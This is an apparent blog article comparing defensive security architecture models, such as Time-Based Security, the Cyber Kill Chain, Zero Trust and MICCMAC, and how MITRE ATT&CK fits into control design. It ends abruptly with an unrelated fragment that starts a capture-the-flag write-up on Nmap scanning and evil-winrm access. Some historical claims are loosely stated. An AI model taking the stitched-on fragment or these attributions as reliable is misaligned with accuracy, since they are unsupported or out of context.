Security Architecture Models

  1. Introduction
  2. The Downfall of Traditional Security Architecture
  3. A new age needs new strategies
    1. Time-Based Security
      1. What is Time-Based Security?
      2. Benefits and Limitations of TBS
        1. Benefits
        2. Limitations
    2. Lockheed Martin Cyber Kill Chain
      1. Structure of the Cyber Kill Chain
      2. Benefits and limitations of the Cyber Kill Chain
        1. Benefits
        2. Limitations
    3. Combination Approach
      1. Combining approach’s for success
      2. Benefits and limitations of the Combined Model
        1. Benefits
        2. Limitations
    4. AWS Well-Architected Framework
      1. Overview of the Five Pillars
      2. Benefits and limitations of the Security Pillar
        1. Benefits
        2. Limitations
    5. Shift Left Model
      1. What are security gates
      2. Benefits and limitations of Shifting Left
        1. Benefits
        2. Limitations
    6. Zero Trust Model
      1. Definition of Zero Trust Security
      2. The Zero Trust Security Model
      3. Benefits and limitations of Zero Trust Security
        1. Benefits
        2. Limitations
    7. MICCMAC
      1. Understanding MICCMAC
      2. Benefits and Limitations of MICCMAC
        1. Benefits
        2. Limitations


In this article, we will explore the different security architecture models available to us and what has driven the drive towards zero trust. These can help us design and organize security controls from the physical layer to the network in a way the helps us prioritise our investments in security by identifying gaps. We will look at the deficiencies of traditional models and newer defensible security architectures.

While network security is a key focus of many security technologies, with the goal of identifying and handling good and bad traffic appropriately, and critical controls like Next-Generation Firewalls (NGFW) and Intrusion Detection Systems (IDS) are important, the network only approach stems from the traditional security model, which concentrates on perimeter controls and often overlooks or assumes trust within the internal environment. A crunchy outside and chewy inside is no longer sufficient and the architectures we look at have evolved to be more comprehensive and data centric.

There have been many great thinkers of early architecture methodologies that have grown increasingly complex over the years to compete with ever growing threats.

Bill Cheswick’s influential 1990 paper, “The Design of a Secure Internet Gateway,” introduced the concept of internet proxies (referred to as gateways). Cheswick highlighted the delicate balance between security and convenience in designing corporate gateways to the internet. Many organizations chose convenience, using a simple router to connect their internal networks to the rest of the world, which he deemed dangerous. Cheswick’s paper came in response to the Morris Worm, the first major internet worm released in 1988.

Other pioneers like Richard Bejtlich and Clifford Stoll have also significantly contributed to the understanding of blue teaming, the defensive aspect of cybersecurity. Clifford Stoll initially discovered now common controls such as Perimeter security, and Honey Pots in the 1980’s, while more than a decade later in the early 2000’s Bejtlich first outlined key characteristics of defensible networks, using his MICCMAC model: they can be monitored, limit intruders’ freedom to manoeuvre, offer minimal services, and can be updated. Taking Stolls identified controls and structuring them in a model helped understand our defensive controls and coverage.

The Downfall of Traditional Security Architecture

Traditional security architecture has struggled to keep pace with the ever-evolving landscape of cyber threats. By focusing excessively on perimeter defence, insufficiently on the internal environment, and having a lack of consideration for Bring Your Own Device (BYOD) policies, Internet of Things (IoT) device, and the organic growth of organizational technology stacks without proper security planning, on top of compliance-driven security all reduces the effectiveness of security in the modern day.

Traditional security architecture has several key deficiencies:

  • Overemphasis on perimeter defence: Traditional security approaches have prioritized the protection of network perimeters, often neglecting the need for robust internal security measures. This has led to the development of flat networks, which can be easily managed but are also susceptible to intruders pivoting from one compromised system to another.
  • De-parameterization: The widespread adoption of cloud services, mobile devices, and IoT has eroded the classic network perimeter. Traditional perimeter controls, such as firewalls, struggle to secure these devices and services, which often escape the scrutiny applied to conventional network devices like desktops and servers.
  • Overreliance on preventive controls: Many organizations rely too heavily on preventive controls at the expense of defensive measures, leading to a lack of effective detective capabilities. When preventive controls inevitably fail, organizations often lack the necessary tools and resources to detect and respond to security incidents.
  • Compliance-driven security: Compliance is an essential aspect of security, but it should not be the primary goal. Compliance-driven security can be harmful when it is viewed as the primary end goal, as it may lead organizations to focus on meeting compliance standards rather than implementing a comprehensive security strategy.
  • Ignoring BYOD and IoT: Traditional security architecture has not adequately considered the challenges posed by BYOD policies and IoT devices. These devices can introduce new attack vectors and vulnerabilities that require a shift in security focus.
  • Organic growth of technology stacks without security planning: The rapid expansion of organizational technology stacks, driven by the adoption of new tools and technologies, has often occurred without proper security planning. This can lead to gaps in security coverage and a false sense of security.

The shortcomings of traditional security architecture have become increasingly apparent as organizations face new and emerging threats. We can no longer trust in our perimeter to keep threats out. Breaches are now holistic, it only takes one employee to use Hola VPN to give a malicious actor access to your environment, one unpatched smart light bulb or one annoyed employee who decided quite quitting was not a sufficient way to express their disappointment in their organisation.

A new age needs new strategies

Time-Based Security

What is Time-Based Security?

Time-Based Security (TBS) is a security architecture model that shifts our understanding of cybersecurity from a static, barrier-focused approach to a dynamic, time-focused perspective. This model, pioneered by Winn Schwartau, focuses on three critical components: protection (P), detection (D), and response (R).

Under TBS, the primary questions that define the security posture of a system are:

  • How long are my systems exposed (Protection)?
  • How long before we detect a compromise (Detection)?
  • How long before we respond (Response)?

The crucial principle of TBS is that the time taken for protection (P) should exceed the sum of the time for detection (D) and response (R). If this principle holds, your systems are secure. If not, you are at risk.

Traditionally, security has been about building robust protection mechanisms. In contrast, TBS argues that no protection is impenetrable given enough time and resources. Therefore, it places equal importance on detecting breaches and responding to them.

To illustrate, consider a physical safe designed to protect valuable assets. The safe has a specific rating indicating how long it can withstand an attack. However, relying solely on the safe’s resilience is not enough. We complement the safe with detection mechanisms—sensors, alarms, cameras—and a response plan to counteract when a breach is detected.

TBS applies the same concept to cybersecurity. It recognizes that given enough time, an attacker can bypass any protection mechanism. Therefore, it emphasizes the need for robust detection systems to identify breaches quickly and response mechanisms to mitigate the impact.

Benefits and Limitations of TBS


  • Quantitative Assessment: TBS provides a reproducible method to understand how much security a product or technology provides. It uses measurable time-based metrics, allowing for more informed decision-making about security investments.
  • Holistic View: TBS considers all aspects of security—protection, detection, and response. This comprehensive approach enables a more robust security posture that goes beyond mere defensive walls.
  • Proactive Risk Management: By focusing on detection and response, TBS encourages proactive risk management. It recognizes that breaches are inevitable and plans accordingly.


  • Difficulty in Measuring Time: Accurately measuring protection, detection, and response times can be challenging in complex environments with multiple layers of security.
  • Changing Threat Landscape: The dynamic nature of cybersecurity threats means that the effectiveness of protection mechanisms may change over time, requiring regular reassessment of the TBS model.
  • Resource Intensive: Implementing a TBS model can be resource-intensive, requiring significant investments in monitoring, detection, and response capabilities.

Lockheed Martin Cyber Kill Chain

The Cyber Kill Chain, also known as the Intrusion Kill Chain, is a model designed by Lockheed Martin to help organizations understand and counteract cyberattacks. This model draws its inspiration from military kill chains, which predate computers and describe a series of steps an attacker must take to achieve their objectives. By identifying these steps and deploying countermeasures at each stage, organizations can significantly reduce the chances of a successful cyberattack. In this article, we will explore the Cyber Kill Chain, its benefits, limitations, and where it can be effectively applied.

Structure of the Cyber Kill Chain

The Cyber Kill Chain, developed by Lockheed Martin, is a model that outlines the stages of a cyberattack, providing a framework for organizations to detect, analyze, and defend against threats. Below is an example model comprising of the seven stages, each with specific countermeasures that can be deployed to prevent or mitigate the impact of an attack.


In this stage, the attacker gathers information about the target organization, such as network infrastructure, systems, and potential vulnerabilities. They may use publicly available information or more advanced methods like scanning and social engineering.

Countermeasures: Implement network segmentation, deploy intrusion detection systems (IDS), monitor network traffic, and enforce strict access controls. Raise awareness about social engineering tactics and educate employees on how to recognize and report suspicious activities.


The attacker creates a weapon, such as malware or a malicious payload, and packages it with an exploit to take advantage of a specific vulnerability.

Countermeasures: Ensure that systems are up-to-date with the latest security patches, deploy antivirus and anti-malware solutions, and employ application whitelisting to prevent unauthorized software from running.


The attacker delivers the weapon to the target, using methods such as email attachments, drive-by downloads, or malicious websites.

Countermeasures: Deploy email security solutions that scan for malicious attachments and links, implement web content filtering, and secure network perimeters using firewalls and intrusion prevention systems (IPS).


The attacker exploits the vulnerability, allowing them to execute the malicious payload on the target system.

Countermeasures: Employ vulnerability management processes to identify, prioritize, and remediate vulnerabilities. Implement network and host-based intrusion detection and prevention systems to detect and block exploit attempts.


The attacker installs the malware on the compromised system, enabling them to maintain persistence and control over the system.

Countermeasures: Use endpoint security solutions to detect and prevent malware installation, implement application control policies, and enforce the principle of least privilege to limit the potential impact of a compromised account.

Command and Control (C2)

The attacker establishes a connection to a command and control server, which allows them to remotely control the compromised system and potentially exfiltrate data.

Countermeasures: Monitor outbound network traffic for suspicious connections, block known malicious IPs and domains, and implement network segmentation to limit lateral movement within the network.


The attacker carries out their intended objective, such as data exfiltration, encryption for ransom, or destruction of data and systems.

Countermeasures: Implement robust data backup and recovery plans, deploy data loss prevention (DLP) solutions, and establish incident response plans to quickly detect, contain, and remediate threats.

Benefits and limitations of the Cyber Kill Chain


  1. Provides a structured approach: The Cyber Kill Chain offers a systematic way for organizations to analyze and prioritize their security investments. By understanding the stages of an attack, organizations can develop targeted strategies to disrupt the chain and prevent attackers from achieving their objectives.
  2. Enhances detection and response: The model helps organizations identify the various stages of a cyberattack, enabling them to deploy appropriate countermeasures at each stage. This improves detection and response capabilities, allowing organizations to prevent or mitigate the impact of cyberattacks.
  3. Encourages proactive security measures: The Cyber Kill Chain encourages organizations to adopt a proactive approach to cybersecurity by focusing on disrupting the attack chain before it reaches its final stages.
  4. Adaptable to various contexts: While the model is often applied to malware and perimeter defenses, it can also be adapted to other contexts, making it a versatile tool for organizations to leverage in their cybersecurity efforts.


  1. Limited scope: The Cyber Kill Chain primarily focuses on external threats and may not adequately address internal threats or other aspects of cybersecurity, such as insider threats, social engineering, or supply chain attacks.
  2. Overemphasis on prevention: The model heavily focuses on prevention, which can lead organizations to neglect other essential aspects of cybersecurity, such as detection, response, and recovery.
  3. Infrastructure-centric approach: Lockheed Martin’s countermeasures are primarily infrastructure-centric, which may not fully address the human element of cybersecurity or the need for robust security policies and procedures.

The Lockheed Martin Cyber Kill Chain provides a valuable framework for understanding and countering cyberattacks. While it has some limitations, organizations can benefit from its structured approach and adapt the model to suit their specific needs. By deploying countermeasures at each stage of the attack chain, organizations can significantly reduce the chances of a successful cyberattack and enhance their overall security posture.

Combination Approach

The rapidly evolving cybersecurity landscape requires innovative and robust defensive strategies. A synergistic approach that combines Time-Based Security (TBS), Lockheed Martin’s Cyber Kill Chain, and MITRE’s ATT&CK framework offers an effective solution. This holistic model allows Security Operations Centers (SOC) to block, detect, and react to threats as early as possible in the attack timeline.

Combining approach’s for success

The combined model utilizes the strengths of each individual framework:

  1. Time-Based Security (TBS): TBS advocates for timely detection and response to threats. The key is to ensure that the sum of the time to detect (D) and react (R) to a threat is less than the time a system is exposed (P).
  2. Lockheed Martin’s Cyber Kill Chain: This model identifies seven stages of a cyberattack (reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives). The goal is to detect and disrupt an attack as early in the kill chain as possible.
  3. MITRE’s ATT&CK Framework: This globally-accessible knowledge base of adversary tactics and techniques is based on real-world observations. It’s used as a foundation for the development of threat models and methodologies in the private sector, government, and the cybersecurity product and service community.

The goal is to detect and respond to threats before the ‘lateral movement’ step in the kill chain, known as the “breakout point”. For instance, during a simulated attack, the SOC had multiple opportunities to block, detect, and react before the breakout point.

TBS and the OODA (Observe, Orient, Decide, Act) loop provide the context for tactical defensive decisions, allowing for efficient management of intrusion risk and minimizing the impact of a compromise.

Additionally, architecting for visibility is crucial. This involves obtaining raw telemetry from various data sources, including network, endpoint, and cloud. The goal is to ensure comprehensive coverage, not just detection, to avoid blind spots in security.

In conclusion, the combination of TBS, Lockheed Martin’s Cyber Kill Chain, and MITRE’s ATT&CK framework provides a robust, comprehensive security architecture model. It enables proactive threat hunting, timely detection and response, and a nuanced understanding of cyber threats, equipping SOCs to effectively defend organizations against advanced adversaries.

Benefits and limitations of the Combined Model


  1. Early Detection and Response: The combined model emphasizes early detection and response, minimizing the risk and potential impact of a breach.
  2. Greater Visibility and Context: It provides greater visibility into threats, offering a comprehensive view of attack techniques.
  3. Proactive Threat Hunting: By leveraging ATT&CK’s knowledge base, security teams can proactively hunt for threats, addressing potential false negatives from detection systems.


  1. Complexity: Implementing and managing this combined approach requires significant technical expertise and resources.
  2. False Positives: While tuning for low false positives is critical, this could lead to false negatives, hence the need for proactive threat hunting.

AWS Well-Architected Framework

Amazon Web Services (AWS) has become a leading provider of cloud computing services, enabling organizations to build, deploy, and manage applications at scale. To help their clients they produced the AWS Well-Architected Framework, which offers a set of guiding principles and best practices for building and maintaining cloud-native applications, with a focus on five core pillars.

The AWS Well-Architected Framework is a comprehensive guide designed to help cloud architects build secure, high-performing, resilient, and efficient infrastructure for their applications. The framework provides a consistent approach for customers and partners to evaluate architectures and implement designs that can scale over time. It is based on five pillars – Operational Excellence, Security, Reliability, Performance Efficiency, and Cost Optimization.

Overview of the Five Pillars

  1. Operational Excellence: Focuses on running and monitoring systems to deliver business value and continuously improve processes.
  2. Security: Emphasizes protecting information, systems, and assets while delivering business value through risk assessments and mitigation strategies.
  3. Reliability: Ensures the ability of a system to recover from infrastructure or service failures and dynamically scale to meet demand.
  4. Performance Efficiency: Involves using computing resources efficiently to meet system requirements and maintain efficiency as demand changes and technologies evolve.
  5. Cost Optimization: Aims to avoid unnecessary costs and ensure the effective use of resources, balancing cost with other architectural priorities.

The Security Pillar is a critical component of the AWS Well-Architected Framework, as it addresses the protection of information, systems, and assets. The pillar consists of several key design principles, such as implementing a strong identity foundation, enabling traceability, and applying security at all layers. It also encourages the use of automation to reduce human error and ensure consistent security policies.

Identity and Access Management (IAM)
This component focuses on ensuring that only authorized and authenticated users and services can access your AWS resources. IAM involves creating and managing user accounts, roles, groups, and permissions. By implementing a strong identity foundation, you can control who has access to which resources and what actions they can perform, reducing the risk of unauthorized access or malicious activities.

Detective Controls
Detective controls involve continuously monitoring and logging activities within your AWS environment to identify potential security threats, anomalies, or misconfigurations. By enabling traceability, you can analyse logs, set up alerts, and detect unauthorized activities or policy violations promptly, allowing for quicker incident response and remediation.

Infrastructure Protection
This component emphasizes applying security at all layers of your infrastructure, from the edge network to your applications and data. Infrastructure protection involves implementing network segmentation, firewalls, intrusion detection and prevention systems (IDPS), web application firewalls (WAF), and secure configurations for operating systems, databases, and other components. It helps to minimize the attack surface and protect your resources from potential threats.

Data Protection
Data protection is about safeguarding your data at rest and in transit. This includes encrypting data, managing encryption keys, applying access controls, and using secure communication protocols (such as HTTPS and TLS). By following data protection best practices, you can prevent unauthorized access, disclosure, or alteration of sensitive information, ensuring data confidentiality, integrity, and availability.

Incident Response
Incident response is the process of preparing for, detecting, containing, and recovering from security incidents, such as data breaches or cyberattacks. This component involves developing an incident response plan, establishing a response team, and incorporating automation to reduce the time it takes to respond to incidents. By having a well-defined incident response process in place, you can minimize the impact of security incidents and prevent them from causing significant damage to your organization.

Benefits and limitations of the Security Pillar


The AWS Well-Architected Framework offers several benefits over other architecture models, making it an appealing choice for organizations looking to build and optimize their cloud-based applications and infrastructure. Its primary value is in organisations that are looking to go “All-In” with AWS.

Comprehensive approach
The AWS Well-Architected Framework covers five essential pillars: Operational Excellence, Security, Reliability, Performance Efficiency, and Cost Optimization. This comprehensive approach ensures that all aspects of your cloud environment are addressed, providing a holistic view of your architecture and helping you identify potential areas of improvement.

Adherence to best practices
The framework is based on AWS’s own experience in designing, deploying, and optimizing cloud architectures for a wide range of use cases and industries. By following the framework’s design principles and best practices, you can ensure that your cloud environment is designed to be secure, efficient, and cost-effective.

Flexibility and adaptability
The AWS Well-Architected Framework can be applied to a wide range of cloud-based applications and infrastructure, from simple web applications to complex, multi-tier architectures. This flexibility makes it suitable for organizations of all sizes and across various industries.

Continuous improvement
The framework encourages a continuous improvement mindset, emphasizing regular reviews and optimizations of your cloud environment. By adopting this approach, you can ensure that your architecture remains up-to-date and aligned with your organization’s evolving needs and goals.

Vendor support
As the framework is developed and maintained by AWS, you can benefit from extensive documentation, tools, and support resources provided by the vendor. This includes AWS Well-Architected Tool, AWS Well-Architected Labs, and access to AWS Solution Architects and Partners, who can assist you in implementing the framework and optimizing your cloud environment.

Enhanced security
The Security Pillar within the framework focuses on critical aspects of cloud security, such as identity and access management, detective controls, infrastructure protection, data protection, and incident response. By implementing these components, you can build a robust security posture that protects your information, systems, and assets.

Cost optimization
The Cost Optimization Pillar helps you identify opportunities to reduce costs without sacrificing performance, security, or reliability. By following the framework’s recommendations, you can minimize waste and ensure that your cloud resources are used efficiently.


While the AWS Well-Architected Framework offers numerous benefits, there are certain limitations compared to other architecture models that should be taken into consideration:

  1. AWS-centric approach: The framework is designed specifically for AWS services and architectures, which can limit its applicability to other cloud platforms or hybrid environments. Organizations using multiple cloud providers or on-premises infrastructure may need to adapt the framework or supplement it with additional guidance to ensure its relevance across their entire infrastructure.
  2. High-level guidance: The AWS Well-Architected Framework provides high-level design principles and best practices, which can be useful for establishing a solid foundation. However, it may not provide detailed implementation guidance for specific use cases or industries. Organizations might need to seek additional resources or consult with experts to address their unique requirements.
  3. Time and effort investment: Implementing the AWS Well-Architected Framework requires a considerable investment of time and effort, particularly for organizations with complex or large-scale cloud environments. This may involve conducting in-depth architecture reviews, implementing recommended changes, and continuously monitoring and optimizing the environment.
  4. Potential vendor lock-in: Adopting the AWS Well-Architected Framework could potentially lead to vendor lock-in, as it is designed to align with AWS services and best practices. Organizations seeking to maintain flexibility in their choice of cloud providers may need to consider alternative architecture models or develop a multi-cloud strategy to mitigate this risk.
  5. Limited community support: Unlike some open-source frameworks or industry standards, the AWS Well-Architected Framework is developed and maintained solely by AWS. While AWS offers extensive support and resources, the framework may not benefit from the same level of community-driven development, collaboration, and innovation that open-source alternatives might provide.
  6. Evolving framework: The AWS Well-Architected Framework is continuously evolving as AWS introduces new services and updates best practices. Organizations using the framework must commit to staying up-to-date with these changes and adapting their architectures accordingly, which can be challenging and time-consuming.

Shift Left Model

The Shift Left model emphasizes the importance of integrating testing and security practices early in the development process. This approach encourages developers, testers, and security teams to collaborate from the beginning of a project, ensuring that potential issues are identified and addressed before they become more complex and expensive to fix.

Infrastructure as Code (IaC) is the practice of managing and provisioning infrastructure components, such as networks, storage, and servers, through code instead of manual processes. IaC allows for faster and more consistent infrastructure deployment, which can lead to improved security as configurations can be standardized and audited more easily.

Software as Code (SaC) is the practice of treating software components and their configurations as code, similar to IaC. This approach ensures that software components are built, tested, and deployed in a consistent and repeatable manner, enhancing security by reducing configuration errors and inconsistencies.

What are security gates

The Shift Left model emphasizes integrating testing and security practices early in the development process, allowing for the identification and resolution of potential vulnerabilities before they become more complex and expensive to fix. A gated release process enhances this approach by defining specific security criteria that must be met before the code progresses to the next stage. Below is a description of a typical gated release process with security gates, for all of the gates there can be different acceptance criteria as code deploys through our environments from Dev to Prod:

  1. Planning and Design Gate: During the planning and design stage, the development team, testers, and security professionals collaborate to identify potential security risks and define security requirements. This gate ensures that security considerations are incorporated into the project’s architecture and design from the outset.
  2. SAST Gate (Static Application Security Testing Gate): The SAST gate is a checkpoint in the gated release process where static application security testing is performed. SAST involves analyzing the source code, byte code, or binary code of an application to identify potential security vulnerabilities without executing the application. By incorporating the SAST gate into the development process, organizations can detect and address security issues early on, before the code is deployed to a testing or production environment.
  3. OSS Gate (Open Source Software Gate): The OSS gate is a checkpoint in the gated release process that focuses on identifying and managing risks associated with using open-source software components in an application. This gate involves conducting an open-source software audit to inventory all OSS components, assess their licenses, and check for known vulnerabilities. By incorporating the OSS gate, organizations can ensure compliance with licensing requirements and reduce the risk of introducing vulnerable components into their applications.
  4. Container Scanning Gate: The Container Scanning gate is a checkpoint in the gated release process for applications that utilize containerized environments, such as Docker or Kubernetes. This gate involves scanning container images for known vulnerabilities, misconfigurations, and compliance with best practices. By incorporating the Container Scanning gate, organizations can ensure the security of their containerized applications and minimize the risk of deploying vulnerable containers.
  5. Infrastructure Scanning Gate: The Infrastructure Scanning gate is a checkpoint in the gated release process that involves scanning an organization’s infrastructure for potential security vulnerabilities and misconfigurations. This may include network devices, servers, storage systems, and cloud environments. By incorporating the Infrastructure Scanning gate, organizations can identify and address infrastructure-related security issues before they become exploitable vulnerabilities in a production environment.
  6. DAST Gate (Dynamic Application Security Testing Gate): The DAST gate involves conducting dynamic application security testing on running applications to identify security vulnerabilities that may not be detected during static analysis. DAST simulates real-world attacks and checks for issues such as injection attacks, cross-site scripting (XSS), and insecure authentication. By incorporating the DAST gate into the development process, organizations can identify and address security vulnerabilities that may only become apparent during runtime.

The big difference with this model is everything runs through code and technical controls block promotion through our environments until the code meets our acceptance criteria, for example any medium or high vulnerabilities stops promotion of code into production. In todays modern environments that make heavy use of Cloud Native Services anything can be done as code, from user account management to firewall and network management.

Benefits and limitations of Shifting Left


To effectively implement Shift Left in your organization, start by encouraging cross-functional collaboration between developers, testers, and security professionals from the beginning of the project. This will help ensure that potential security issues are identified and addressed before development begins.

Utilize automation tools to streamline testing, security checks, and infrastructure deployment. Continuous Integration (CI) and Continuous Deployment (CD) pipelines can be particularly useful for automating these processes, ensuring that infrastructure and software components are consistently and securely deployed.

Leverage IaC and SaC to create standardized configurations for your infrastructure and software components. This will help to reduce configuration errors and inconsistencies, improving security across the organization.

Regularly monitor and audit your infrastructure and software components to identify potential security issues. Implement continuous monitoring tools and perform periodic audits to ensure that your configurations remain secure and compliant with industry best practices and regulatory requirements.

Equip your team with the necessary skills and knowledge to effectively implement Shift Left, IaC, and SaC approaches. Provide training on security best practices, testing methodologies, and relevant tools to ensure that all team members can contribute to the success of the initiative.


  1. Increased Complexity: Integrating security into every stage of the SDLC can increase complexity. Development teams must be well-versed in security principles and practices, which can be a steep learning curve.
  2. Resource Intensive: Shift Left security requires a considerable investment of resources, including time and personnel. It requires skilled security professionals who can work closely with development teams, which may be a challenge for smaller organizations or those with limited budgets.
  3. Potential for Slower Development Cycle: While the aim of Shift Left is to streamline the development process by catching issues early, it can initially lead to a slower development cycle, as new practices and checks are introduced.
  4. Dependency on Automation Tools: Shift Left security relies heavily on automation tools to scan and detect vulnerabilities during the early stages of development. However, these tools are not infallible and may miss some types of vulnerabilities, leading to a false sense of security.
  5. Risk of Overemphasis on Security: While the idea of ‘security first’ is fundamentally sound, there’s a risk of overemphasizing security to the detriment of other important aspects of software development, such as functionality and user experience.
  6. Culture Shift Requirement: Shift Left requires a significant culture shift within the organization. Everyone involved in the SDLC, from developers to operations, must embrace security as a part of their role. This change can face resistance and require considerable effort and leadership commitment to implement effectively.
  7. Potential for Increased Conflicts: Integrating security into the SDLC could potentially lead to more conflicts between the security team and the development team, especially if the security measures are perceived as hindering the development process or the implementation of certain features.

Zero Trust Model

The concept of Zero Trust Security is a revolutionary approach to cybersecurity that challenges the traditional “trust but verify” model. Created by Forrester, it offers a more comprehensive and secure model for today’s complex digital landscape.

Definition of Zero Trust Security

Zero Trust Security is a cybersecurity model that eliminates the concept of trust based on network location. It operates on the principle that no user or device, whether inside or outside the organization’s network, should be trusted by default. Instead, every access request is thoroughly verified before granting access. This approach embeds security into the DNA of your IT architecture, fundamentally transforming the design of networks from the inside out.

The Zero Trust Security Model

The Zero Trust Security model revolves around three main concepts:

  1. Secure Access: Ensure all resources are accessed securely, regardless of their location.
  2. Least Privilege Access: Adopt a strategy that enforces strict access control, granting users only the permissions they need to perform their tasks.
  3. Inspect and Log All Traffic: Monitor and log all network traffic to detect and respond to suspicious activities promptly.

The model was officially published in the NIST SP 800-207 in late 2020 and offers a way to transition from the traditional “candy bar” network design, with its vulnerable “soft, chewy center,” to a more secure architecture. Implementation can start with new projects or technologies, followed by converting existing technologies, and gradually chipping away at the rest.

Benefits and limitations of Zero Trust Security


  1. Enhanced Security: By assuming all traffic is untrusted, Zero Trust Security significantly reduces the risk of a breach.
  2. Greater Visibility: By inspecting and logging all traffic, organizations gain greater visibility into their network activities, enabling them to detect and respond to threats more quickly.
  3. Flexibility: The Zero Trust model is adaptable and can be applied to a wide range of environments, including cloud, mobile, and on-premise networks.


  1. Implementation Complexity: Transitioning to a Zero Trust model can be complex, requiring substantial changes to existing network architectures and policies.
  2. Cost: Implementing Zero Trust Security can be expensive, requiring significant investments in new technologies and training.
  3. User Experience: The strict access controls of Zero Trust Security can potentially impact user experience and productivity if not implemented carefully.


In the ever-evolving cyber threat landscape, traditional security architectures often fall short of effectively protecting organizations. Recognizing these shortcomings, Richard Bejtlich introduced Defensible Network Architecture in 2008. This concept was further refined with Defensible Network Architecture 2.0, which introduces the innovative MICCMAC model: Monitored, Inventoried, Controlled, Claimed, Minimized, Assessed, and Current.

Understanding MICCMAC

The MICCMAC model is a holistic and strategic approach to cybersecurity, incorporating seven key principles:

  • Monitored: The model emphasizes the deployment of security monitoring, Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and other tools to actively monitor network traffic for potential threats.
  • Inventoried: Organizations are urged to maintain a comprehensive inventory of all hosts and applications within their network. This helps identify unauthorized devices or applications quickly.
  • Controlled: By implementing ingress and egress filtering, organizations can manage and restrict network traffic, reducing potential attack vectors.
  • Claimed: Assigning ownership to all systems enhances accountability for their security, fostering a sense of responsibility within the team.
  • Minimized: Reducing the attack surface by limiting unnecessary services and applications decreases the number of potential entry points for attackers.
  • Assessed: Regular vulnerability assessments help identify potential weaknesses in the network, allowing for timely mitigation.
  • Current: Ensuring all systems are up-to-date with the latest patches and security updates is a crucial element of the MICCMAC model.

Benefits and Limitations of MICCMAC


Despite its simplicity, the MICCMAC framework boasts several advantages over traditional security models.

  • Enhanced Intrusion Resistance: By incorporating a comprehensive and proactive security strategy, MICCMAC helps organizations improve their resistance to intrusions, even when absolute prevention is impossible.
  • Improved Security Posture: The framework’s focus on continuous monitoring, assessment, and improvement leads to a more robust and resilient security posture.
  • Increased Accountability: The principle of system ownership encourages a culture of responsibility and security awareness across the organization.
  • Reduced Attack Surface: Limiting unnecessary services and applications results in fewer potential entry points for attackers, reducing the overall risk.
  • Strategic Planning: With its emphasis on long-term commitment to better security, MICCMAC enables organizations to develop a more comprehensive and strategic approach to their cybersecurity efforts.


While MICCMAC offers a more holistic approach to cybersecurity, it’s not without its limitations.

  • Oversimplification: The framework’s simplicity, while beneficial in some respects, can also be a disadvantage. It may not cover all aspects of an organization’s unique security needs, necessitating supplemental strategies.
  • Reliance on Human Intervention: MICCMAC relies heavily on human intervention for monitoring, assessing, and maintaining systems. This could be prone to human error and might not be scalable for larger organizations.
  • Requires Skilled Personnel: The model’s effectiveness depends on the organization’s ability to hire and retain skilled security professionals who can implement and manage the security measures.
  • Limited Automation: Unlike some more modern security frameworks, MICCMAC does not explicitly incorporate automation, which can help scale security efforts and reduce human error.

In conclusion, the MICCMAC model represents a significant evolution from traditional security architectures. Its emphasis on holistic and proactive security practices can enhance an organization’s ability to defend against the increasingly complex cyber threat landscape. However, it is crucial to consider its limitations and supplement the framework as needed to align with your organization’s unique security requirements,

Architecting for the kill chain

MITRE ATT&CK framework can be a great resource for tracking and reviewing the kill chain and methodology used by threat actors, as part of a recent move to security architecture I got interested in how to design defence in depth that is mapped to adversarial threat actors kill chains and MITRE so I could better review where controls were weak and what mitigations could be put in place. Using AttackIQ I found some decent resources.

For this MITRE ATT&CK is a global and free tool, which is an impressive way to look through the different tactics, techniques and procedures used by Advanced Persistent Threat actors worldwide. Tactics are the technical goals under MITRE, techniques are how the goal is achieved and procedures are the specific implementations of techniques. Using this we can identify our crown jewels to protect and identify the procedures and techniques to layer our defences around.

Before we go into MITRE, we need to understand how to help structure our approach for designing our defences. We will be looking at the standard methodology of Plan – Design – Implement – Measure.


With the plan phase we should review business objectives, and threats (known and assumed) – ideally theses should be tracked as current risks in the risk register, and the resources available to us. Here we look at the frameworks we want to use (SANS CC, NIST CSF), regulatory drivers (NIS-D) and contractual requirements. To ensure it covers our threats we must make sure we gather information through Threat Intelligence or other methods on what our threats are. This information should feed our overall strategy and include:

  • Your organisations security team.
  • Third party sources like MITRE, CISA and Searchlight.
  • Manual searches through Shodan, Google or darknet forums.

For MITRE we can use our teams and understanding of the organisations industry to identify the threats and APTs facing your organisation and then using the TTPs for those groups we can start identifying mitigating controls. A group I picked at random is APT12, here we can see this group uses:

  • Spear Phishing with malicious attachments (Initial Access).
  • Exploitation for Client Execution and Malicious Files (Execution).
  • DNS Calculation and Bidirectional Communication (Command and Control).

Reviewing all the threat groups in MITRE that could target your organisation and try to pick out commonalities its TTP for designing the controls needed. While MITRE can give us the generalised information on adversaries, purple teaming can really build on this to give the business specific context. By linking in your SOC heroes and Vulnerability villains you can produce a better understanding of how the MITRE threats and TTPs can fit within your organisations existing defences which can help build more efficient controls around them.

Breach & Attack Simulator tools can also be used with wargaming and tabletop exercises to help tie together the strategy and highlight gaps that need addressing.


With the strategy of what we need to do completed we must now turn this into a blueprint with tooling requirements, processes defined and drawn up, the operating model that will govern the programme and any other items that need to be considered to protect against the adversaries. The best design would follow a process and people-based approach before looking at tools to supplement and automate the controls.

MITRE can assess this as it lists recommended mitigations for the threat actors TTP’s. While these can be high level it can be helpful to use them as the base of our Design framework. MITRE’s Vendor Evaluations can be used to supplement traditional vendor assessment reviews like Gartner to help tie tooling into the mitigations to specific TTP’s.

Using the BAS tools and wargames from the planning stage we can tie these assessments into our tool assessments to get the right mixture of technologies for the organisation’s threats.


During this phase we document our policies, procedures and put in place our processes. Staff upskilling takes place, and any tools are acquired and deployed. At each stage of the implementation process and with each new tool that is deployed BAS and Wargames should be conducted for continuous assessments to make sure to tooling selection from the design phase and the strategic decisions from the Planning stage are having the desired effect.


If it cannot be measured it does not exist. A hard learned lesson by many auditors but a valuable one. After the program has been successfully planned, mapped out and deployed we then must define or SLA’s, KPIs and other metrics to ensure each part is operating effectively – doing this early can ease the turmoil of SOC 2 and other Control Effectiveness audits.

The measure phase is the BAU phase an includes managing, operating, and maintaining the security posture and most have a feedback loop back to the planning phase. Continually reviewing the effectiveness of the controls against new and emerging threats with the expertise of the organisation’s security teams, using wargaming and BAS to assist can ensure security does not stand still and continually improves. TRAM can also be leveraged to improve the mapping as an open-source tool that can tie threat intelligence into MITRE’s ATT&CK framework.


One of VBScripts boxes on windows focuses heavily on reversing applications to crack credentials.

Run Nmap

Only 445 is open? Lets run again with the -p- flag to confirm, feeling like another evil-winrm box.

Foothold Enumeration

